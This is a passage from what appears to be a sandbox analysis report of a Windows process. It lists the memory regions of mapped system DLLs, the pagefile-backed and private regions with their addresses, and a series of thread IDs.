"c:\\windows\\system32\\usp10.dll") Region: id = 1191 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1192 start_va = 0x76e70000 end_va = 0x76fa5fff entry_point = 0x76e70000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1193 start_va = 0x76fb0000 end_va = 0x771aafff entry_point = 0x76fb0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1194 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1195 start_va = 0x77370000 end_va = 0x77372fff entry_point = 0x77370000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 1196 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1197 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1198 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1199 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1200 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1201 start_va = 0x7ff9a000 end_va = 0x7ff9afff entry_point = 0x0 region_type = private name = "private_0x000000007ff9a000" filename = "" Region: id = 1202 start_va = 0x7ff9b000 end_va = 0x7ff9bfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9b000" filename = "" Region: id = 1203 start_va = 0x7ff9c000 end_va = 0x7ff9cfff entry_point = 0x0 region_type = private name = "private_0x000000007ff9c000" filename = "" Region: id = 1204 start_va = 0x7ff9f000 end_va = 0x7ff9ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff9f000" filename = "" Region: id = 1205 start_va = 0x7ffa1000 end_va = 0x7ffa1fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa1000" filename = "" Region: id = 1206 start_va = 0x7ffa2000 end_va = 0x7ffa2fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa2000" filename = "" Region: id = 1207 start_va = 0x7ffa3000 end_va = 0x7ffa3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa3000" filename = "" Region: id = 1208 start_va = 0x7ffa4000 end_va = 0x7ffa4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 1209 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 1210 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 1211 start_va = 0x7ffa8000 end_va = 0x7ffa8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa8000" filename = "" Region: id = 1212 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 1213 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 1214 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 1215 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 1216 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 1217 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 1218 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 1219 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1220 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 1221 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1222 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1223 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1224 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1225 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1226 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1227 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1228 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1229 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1230 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1231 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1232 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 46 os_tid = 0xabc Thread: id = 47 os_tid = 0x930 Thread: id = 48 os_tid = 0x308 Thread: id = 49 os_tid = 0x7a0 Thread: id = 50 os_tid = 0x71c Thread: id = 51 os_tid = 0x734 Thread: id = 52 os_tid = 0x6f8 Thread: id = 53 os_tid = 0x6b8 Thread: id = 54 os_tid = 0x6b0 Thread: id = 55 os_tid = 0x6a8 Thread: id = 56 os_tid = 0x674 Thread: id = 57 os_tid = 0x418 Thread: id = 58 os_tid = 0x268 Thread: id = 59 os_tid = 0x150 Thread: id = 60 os_tid = 0x798 Thread: id = 61 os_tid = 0x72c Thread: id = 62 os_tid = 0x708 Thread: id = 63 os_tid = 0x704 Thread: id = 64 os_tid = 0x6f8 Thread: id = 65 os_tid = 0x6cc Thread: id = 66 os_tid = 0x6c8 Thread: id = 67 os_tid = 0x6c0 Thread: id = 68 os_tid = 0x6bc Thread: id = 69 os_tid = 0x6ac Thread: id = 70 os_tid = 0x6a4 Thread: id = 71 os_tid = 0x67c Thread: id = 72 os_tid = 0x604 Thread: id = 73 os_tid = 0x5f8 Thread: id = 74 os_tid = 0x5e8 Thread: id = 75 os_tid = 0x5e4 Thread: id = 76 os_tid = 0x5d8 Thread: id = 77 os_tid = 0x5bc Thread: id = 78 os_tid = 0x5b0 Thread: id = 86 os_tid = 0xda4 Thread: id = 87 os_tid = 0xda8